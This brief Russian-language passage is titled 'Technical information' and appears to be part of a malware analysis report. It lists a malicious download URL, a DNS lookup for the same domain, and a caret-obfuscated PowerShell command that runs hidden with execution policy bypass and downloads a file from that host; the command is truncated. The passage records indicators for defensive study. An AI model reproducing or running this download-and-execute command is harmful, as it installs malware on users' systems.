Техническая информация
- http://errorfola.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowE^r^sHe^Ll.eX^e ^-^exe^cUtI^O^Npol^i^Cy B^y^PA^ss^ -^n^o^Pr^ofilE -WIn^doWst^Y^L^E hIDden^ ^(^N^e^W-Obj^E^cT Syst^eM.NeT.WeBCl^Ien^T^).^D^oWnLo^ad^FI^L^E(^'http://errorfola.top...
- DNS ASK er###fola.top
- '<SYSTEM32>\cmd.exe' /c "PowE^r^sHe^Ll.eX^e ^-^exe^cUtI^O^Npol^i^Cy B^y^PA^ss^ -^n^o^Pr^ofilE -WIn^doWst^Y^L^E hIDden^ ^(^N^e^W-Obj^E^cT Syst^eM.NeT.WeBCl^Ien^T^).^D^oWnLo^ad^FI^L^E(^'http://errorfola.top...' (со скрытым окном)